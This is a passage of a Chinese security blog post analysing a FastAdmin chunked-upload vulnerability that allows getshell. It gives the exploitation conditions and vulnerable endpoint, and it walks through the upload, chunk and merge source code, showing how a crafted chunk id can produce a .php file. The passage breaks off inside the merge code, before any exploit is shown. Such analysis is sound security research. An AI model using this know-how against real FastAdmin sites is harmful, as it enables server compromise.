<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="一、漏洞详情： 从公开的文章可以得到以下信息：  漏洞利用需要普通用户权限并且配置开启了分片上传功能 漏洞api在index&#x2F;ajax&#x2F;upload 源码上传路径固定，可以推测出 漏洞位置application&#x2F;api&#x2F;controller&#x2F;Common.php#upload()  二、源码分析这里说明下，分片功能是在FastAdmin1.2.0版本才开始使用，所以下载的话从V1.2.0.2020">
<meta property="og:type" content="article">
<meta property="og:title" content="Fastadmin最新文件上传漏洞可Getshell分析">
<meta property="og:url" content="http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/index.html">
<meta property="og:site_name" content="R17a&#39;s blog">
<meta property="og:description" content="一、漏洞详情： 从公开的文章可以得到以下信息：  漏洞利用需要普通用户权限并且配置开启了分片上传功能 漏洞api在index&#x2F;ajax&#x2F;upload 源码上传路径固定，可以推测出 漏洞位置application&#x2F;api&#x2F;controller&#x2F;Common.php#upload()  二、源码分析这里说明下，分片功能是在FastAdmin1.2.0版本才开始使用，所以下载的话从V1.2.0.2020">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/imgs/image-20210407185344994.png">
<meta property="og:image" content="http://yoursite.com/imgs/image-20210407175758926.png">
<meta property="og:image" content="http://yoursite.com/imgs/image-20210408094404668.png">
<meta property="og:image" content="http://yoursite.com/imgs/image-20210408094640492.png">
<meta property="og:image" content="http://yoursite.com/imgs/image-20210407180936669.png">
<meta property="og:image" content="http://yoursite.com/imgs/image-20210407182123714.png">
<meta property="og:image" content="http://yoursite.com/imgs/image-20210407190303993.png">
<meta property="article:published_time" content="2021-04-07T05:49:50.000Z">
<meta property="article:modified_time" content="2021-04-07T05:49:50.000Z">
<meta property="article:author" content="R17a">
<meta property="article:tag" content="文件上传">
<meta property="article:tag" content="Fastadmin">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/imgs/image-20210407185344994.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Fastadmin最新文件上传漏洞可Getshell分析</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/download/">Download</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2021/06/02/Java%E5%9F%BA%E7%A1%80%E4%B9%8B%E5%B8%B8%E7%94%A8%E7%B1%BB/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2021/03/03/MSF%E7%AC%94%E8%AE%B0/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&text=Fastadmin最新文件上传漏洞可Getshell分析" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&title=Fastadmin最新文件上传漏洞可Getshell分析" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&is_video=false&description=Fastadmin最新文件上传漏洞可Getshell分析" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Fastadmin最新文件上传漏洞可Getshell分析&body=Check out this article: http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&title=Fastadmin最新文件上传漏洞可Getshell分析" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&title=Fastadmin最新文件上传漏洞可Getshell分析" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&title=Fastadmin最新文件上传漏洞可Getshell分析" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&title=Fastadmin最新文件上传漏洞可Getshell分析" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&name=Fastadmin最新文件上传漏洞可Getshell分析&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2021/04/07/Fastadmin%E6%9C%80%E6%96%B0rce%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6/&t=Fastadmin最新文件上传漏洞可Getshell分析" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#一、漏洞详情："><span class="toc-number">1.</span> <span class="toc-text">一、漏洞详情：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#二、源码分析"><span class="toc-number">2.</span> <span class="toc-text">二、源码分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1、upload-上传文件源码分析"><span class="toc-number">2.1.</span> <span class="toc-text">1、upload() 上传文件源码分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2、chunk-分片上传源码分析"><span class="toc-number">2.2.</span> <span class="toc-text">2、chunk()分片上传源码分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3、merge-合并分片文件源码分析"><span class="toc-number">2.3.</span> <span class="toc-text">3、merge()合并分片文件源码分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4、梳理漏洞信息"><span class="toc-number">2.4.</span> <span class="toc-text">4、梳理漏洞信息</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#三、搭建漏洞环境"><span class="toc-number">3.</span> <span class="toc-text">三、搭建漏洞环境</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1、下载Fastadmin：V1-2-0-20201001-beta"><span class="toc-number">3.1.</span> <span class="toc-text">1、下载Fastadmin：V1.2.0.20201001_beta</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2、搭建php-mysql-nginx环境"><span class="toc-number">3.2.</span> <span class="toc-text">2、搭建php+mysql+nginx环境</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3、问题解决："><span class="toc-number">3.3.</span> <span class="toc-text">3、问题解决：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4、install-php安装"><span class="toc-number">3.4.</span> <span class="toc-text">4、install.php安装</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5、漏洞利用条件设置"><span class="toc-number">3.5.</span> <span class="toc-text">5、漏洞利用条件设置</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#四、复现EXP"><span class="toc-number">4.</span> <span class="toc-text">四、复现EXP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#参考链接："><span class="toc-number">5.</span> <span class="toc-text">参考链接：</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Fastadmin最新文件上传漏洞可Getshell分析
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">R17a</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-04-07T05:49:50.000Z" itemprop="datePublished">2021-04-07</time>
        
        (Updated: <time datetime="2021-04-07T05:49:50.000Z" itemprop="dateModified">2021-04-07</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Fastadmin/">Fastadmin</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/Fastadmin/" rel="tag">Fastadmin</a>, <a class="tag-link" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="tag">文件上传</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h3 id="一、漏洞详情："><a href="#一、漏洞详情：" class="headerlink" title="一、漏洞详情："></a>一、漏洞详情：</h3><p><img src="/imgs/image-20210407185344994.png" alt="image-20210407185344994"></p>
<p>从公开的<a href="https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg" target="_blank" rel="noopener">文章</a>可以得到以下信息：</p>
<ol>
<li>漏洞利用需要<strong>普通用户权限</strong>并且配置开启了<strong>分片上传功能</strong></li>
<li>漏洞api在<code>index/ajax/upload</code></li>
<li>源码上传路径固定，可以推测出</li>
<li>漏洞位置<code>application/api/controller/Common.php#upload()</code></li>
</ol>
<h3 id="二、源码分析"><a href="#二、源码分析" class="headerlink" title="二、源码分析"></a>二、源码分析</h3><p>这里说明下，分片功能是在FastAdmin1.2.0版本才开始使用，所以下载的话从<a href="https://www.fastadmin.net/download/full.html?version=1.2.0.20201001_beta" target="_blank" rel="noopener">V1.2.0.20201001_beta</a>版本及之后的版本下载。</p>
<p><img src="/imgs/image-20210407175758926.png" alt="image-20210407175758926"></p>
<h4 id="1、upload-上传文件源码分析"><a href="#1、upload-上传文件源码分析" class="headerlink" title="1、upload() 上传文件源码分析"></a>1、upload() 上传文件源码分析</h4><p><code>application/api/controller/Common.php#upload()</code>源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 上传文件</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@ApiMethod</span> (POST)</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> File $file 文件流</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    Config::set(<span class="string">'default_return_type'</span>, <span class="string">'json'</span>);</span><br><span class="line">    <span class="comment">//必须设定cdnurl为空,否则cdnurl函数计算错误</span></span><br><span class="line">    Config::set(<span class="string">'upload.cdnurl'</span>, <span class="string">''</span>);</span><br><span class="line">    $chunkid = <span class="keyword">$this</span>-&gt;request-&gt;post(<span class="string">"chunkid"</span>);</span><br><span class="line">    <span class="keyword">if</span> ($chunkid) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!Config::get(<span class="string">'upload.chunking'</span>)) &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;error(__(<span class="string">'Chunk file disabled'</span>));</span><br><span class="line">        &#125;</span><br><span class="line">        $action = <span class="keyword">$this</span>-&gt;request-&gt;post(<span class="string">"action"</span>);</span><br><span class="line">        $chunkindex = <span class="keyword">$this</span>-&gt;request-&gt;post(<span class="string">"chunkindex/d"</span>);</span><br><span class="line">        $chunkcount = <span class="keyword">$this</span>-&gt;request-&gt;post(<span class="string">"chunkcount/d"</span>);</span><br><span class="line">        $filename = <span class="keyword">$this</span>-&gt;request-&gt;post(<span class="string">"filename"</span>);</span><br><span class="line">        $method = <span class="keyword">$this</span>-&gt;request-&gt;method(<span class="keyword">true</span>);</span><br><span class="line">        <span class="keyword">if</span> ($action == <span class="string">'merge'</span>) &#123;</span><br><span class="line">            $attachment = <span class="keyword">null</span>;</span><br><span class="line">            <span class="comment">//合并分片文件</span></span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                $upload = <span class="keyword">new</span> Upload();</span><br><span class="line">                $attachment = $upload-&gt;merge($chunkid, $chunkcount, $filename);</span><br><span class="line">            &#125; <span class="keyword">catch</span> (UploadException $e) &#123;</span><br><span class="line">                <span class="keyword">$this</span>-&gt;error($e-&gt;getMessage());</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;success(__(<span class="string">'Uploaded successful'</span>), [<span class="string">'url'</span> =&gt; $attachment-&gt;url, <span class="string">'fullurl'</span> =&gt; cdnurl($attachment-&gt;url, <span class="keyword">true</span>)]);</span><br><span class="line">        &#125; <span class="keyword">elseif</span> ($method == <span class="string">'clean'</span>) &#123;</span><br><span class="line">            <span class="comment">//删除冗余的分片文件</span></span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                $upload = <span class="keyword">new</span> Upload();</span><br><span class="line">                $upload-&gt;clean($chunkid);</span><br><span class="line">            &#125; <span class="keyword">catch</span> (UploadException $e) &#123;</span><br><span class="line">                <span class="keyword">$this</span>-&gt;error($e-&gt;getMessage());</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;success();</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="comment">//上传分片文件</span></span><br><span class="line">            <span class="comment">//默认普通上传文件</span></span><br><span class="line">            $file = <span class="keyword">$this</span>-&gt;request-&gt;file(<span class="string">'file'</span>);</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                $upload = <span class="keyword">new</span> Upload($file);</span><br><span class="line">                $upload-&gt;chunk($chunkid, $chunkindex, $chunkcount);</span><br><span class="line">            &#125; <span class="keyword">catch</span> (UploadException $e) &#123;</span><br><span class="line">                <span class="keyword">$this</span>-&gt;error($e-&gt;getMessage());</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;success();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        $attachment = <span class="keyword">null</span>;</span><br><span class="line">        <span class="comment">//默认普通上传文件</span></span><br><span class="line">        $file = <span class="keyword">$this</span>-&gt;request-&gt;file(<span class="string">'file'</span>);</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            $upload = <span class="keyword">new</span> Upload($file);</span><br><span class="line">            $attachment = $upload-&gt;upload();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (UploadException $e) &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;error($e-&gt;getMessage());</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">$this</span>-&gt;success(__(<span class="string">'Uploaded successful'</span>), [<span class="string">'url'</span> =&gt; $attachment-&gt;url, <span class="string">'fullurl'</span> =&gt; cdnurl($attachment-&gt;url, <span class="keyword">true</span>)]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析代码逻辑：</p>
<ol>
<li>获取post参数chunkid，有chunkid的情况属于分片文件，没有就是普通文件上传</li>
<li>获取分片文件上传需要的参数值，包括action、chunkindex、chunkcount、filename</li>
<li>首先判断action值，merge的话指定将会合并文件、clean的话指定将会删除冗余文件，其它情况就认为是上传分片</li>
</ol>
<h4 id="2、chunk-分片上传源码分析"><a href="#2、chunk-分片上传源码分析" class="headerlink" title="2、chunk()分片上传源码分析"></a>2、chunk()分片上传源码分析</h4><p>点进<code>chunk($chunkid, $chunkindex, $chunkcount)</code>和<code>merge($chunkid, $chunkcount, $filename)</code>分别分析，两个方法在<code>application/common/library/upload.php</code>文件</p>
<p>chunk源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 分片上传</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@throws</span> UploadException</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">chunk</span><span class="params">($chunkid, $chunkindex, $chunkcount, $chunkfilesize = null, $chunkfilename = null, $direct = false)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;fileInfo[<span class="string">'type'</span>] != <span class="string">'application/octet-stream'</span>) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> UploadException(__(<span class="string">'Uploaded file format is limited'</span>));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $destDir = RUNTIME_PATH . <span class="string">'chunks'</span>;</span><br><span class="line">    $fileName = $chunkid . <span class="string">"-"</span> . $chunkindex . <span class="string">'.part'</span>;</span><br><span class="line">    $destFile = $destDir . DS . $fileName;</span><br><span class="line">    <span class="keyword">if</span> (!is_dir($destDir)) &#123;</span><br><span class="line">        @mkdir($destDir, <span class="number">0755</span>, <span class="keyword">true</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (!move_uploaded_file(<span class="keyword">$this</span>-&gt;file-&gt;getPathname(), $destFile)) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> UploadException(__(<span class="string">'Chunk file write error'</span>));</span><br><span class="line">    &#125;</span><br><span class="line">    $file = <span class="keyword">new</span> File($destFile);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;setFile($file);</span><br><span class="line">    <span class="keyword">return</span> $file;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>chunk代码逻辑：</p>
<ol>
<li>判断Content-Type，需要是<code>application/octet-stream</code>才可以继续</li>
<li>分片文件名称以<code>chunkid-chunkindex.part</code>命名，形如123.php-0.part</li>
<li>destDir没有创建的话先创建，移动文件到目标文件</li>
</ol>
<h4 id="3、merge-合并分片文件源码分析"><a href="#3、merge-合并分片文件源码分析" class="headerlink" title="3、merge()合并分片文件源码分析"></a>3、merge()合并分片文件源码分析</h4><p>merge源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line">  <span class="comment">/**</span></span><br><span class="line"><span class="comment">   * 合并分片文件</span></span><br><span class="line"><span class="comment">   * <span class="doctag">@param</span> string $chunkid</span></span><br><span class="line"><span class="comment">   * <span class="doctag">@param</span> int    $chunkcount</span></span><br><span class="line"><span class="comment">   * <span class="doctag">@param</span> string $filename</span></span><br><span class="line"><span class="comment">   * <span class="doctag">@return</span> attachment|\think\Model</span></span><br><span class="line"><span class="comment">   * <span class="doctag">@throws</span> UploadException</span></span><br><span class="line"><span class="comment">   */</span></span><br><span class="line">  <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">merge</span><span class="params">($chunkid, $chunkcount, $filename)</span></span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">      $filePath = <span class="keyword">$this</span>-&gt;chunkDir . DS . $chunkid;</span><br><span class="line"></span><br><span class="line">      $completed = <span class="keyword">true</span>;</span><br><span class="line">      <span class="comment">//检查所有分片是否都存在</span></span><br><span class="line">      <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; $chunkcount; $i++) &#123;</span><br><span class="line">          <span class="keyword">if</span> (!file_exists(<span class="string">"&#123;$filePath&#125;-&#123;$i&#125;.part"</span>)) &#123;</span><br><span class="line">              $completed = <span class="keyword">false</span>;</span><br><span class="line">              <span class="keyword">break</span>;</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">if</span> (!$completed) &#123;</span><br><span class="line">          <span class="keyword">$this</span>-&gt;clean($chunkid);</span><br><span class="line">          <span class="keyword">throw</span> <span class="keyword">new</span> UploadException(__(<span class="string">'Chunk file info error'</span>));</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      <span class="comment">//如果所有文件分片都上传完毕，开始合并</span></span><br><span class="line">      $uploadPath = $filePath;</span><br><span class="line"><span class="comment">// $destFile就是$uploadPath，也就是$filePath</span></span><br><span class="line">      <span class="keyword">if</span> (!$destFile = @fopen($uploadPath, <span class="string">"wb"</span>)) &#123;</span><br><span class="line">          <span class="keyword">$this</span>-&gt;clean($chunkid);</span><br><span class="line">          <span class="keyword">throw</span> <span class="keyword">new</span> UploadException(__(<span class="string">'Chunk file merge error'</span>));</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">if</span> (flock($destFile, LOCK_EX)) &#123; <span class="comment">// 进行排他型锁定</span></span><br><span class="line">          <span class="comment">// 从0到chunkcount分片数，把所有.part文件进行合并</span></span><br><span class="line">          <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; $chunkcount; $i++) &#123;</span><br><span class="line">              $partFile = <span class="string">"&#123;$filePath&#125;-&#123;$i&#125;.part"</span>;</span><br><span class="line">              <span class="keyword">if</span> (!$handle = @fopen($partFile, <span class="string">"rb"</span>)) &#123;</span><br><span class="line">                  <span class="keyword">break</span>;</span><br><span class="line">              &#125;</span><br><span class="line">              <span class="comment">// 写入文件，位置为destFile</span></span><br><span class="line">              <span class="keyword">while</span> ($buff = fread($handle, filesize($partFile))) &#123;</span><br><span class="line">                  fwrite($destFile, $buff);</span><br><span class="line">              &#125;</span><br><span class="line">              @fclose($handle);</span><br><span class="line">              @unlink($partFile); <span class="comment">//删除分片</span></span><br><span class="line">          &#125;</span><br><span class="line"></span><br><span class="line">          flock($destFile, LOCK_UN);</span><br><span class="line">      &#125;</span><br><span class="line">      @fclose($destFile);</span><br><span class="line"></span><br><span class="line">      $file = <span class="keyword">new</span> File($uploadPath);</span><br><span class="line">      $info = [</span><br><span class="line">          <span class="string">'name'</span>     =&gt; $filename,</span><br><span class="line">          <span class="string">'type'</span>     =&gt; $file-&gt;getMime(),</span><br><span class="line">          <span class="string">'tmp_name'</span> =&gt; $uploadPath,</span><br><span class="line">          <span class="string">'error'</span>    =&gt; <span class="number">0</span>,</span><br><span class="line">          <span class="string">'size'</span>     =&gt; $file-&gt;getSize()</span><br><span class="line">      ];</span><br><span class="line">      $file-&gt;setSaveName($filename)-&gt;setUploadInfo($info);</span><br><span class="line">      $file-&gt;isTest(<span class="keyword">true</span>);</span><br><span class="line"></span><br><span class="line">      <span class="comment">//重新设置文件</span></span><br><span class="line">      <span class="keyword">$this</span>-&gt;setFile($file);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">unset</span>($file);</span><br><span class="line">      <span class="keyword">$this</span>-&gt;merging = <span class="keyword">true</span>;</span><br><span class="line"></span><br><span class="line">      <span class="comment">//允许大文件</span></span><br><span class="line">      <span class="keyword">$this</span>-&gt;config[<span class="string">'maxsize'</span>] = <span class="string">"1024G"</span>;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">return</span> 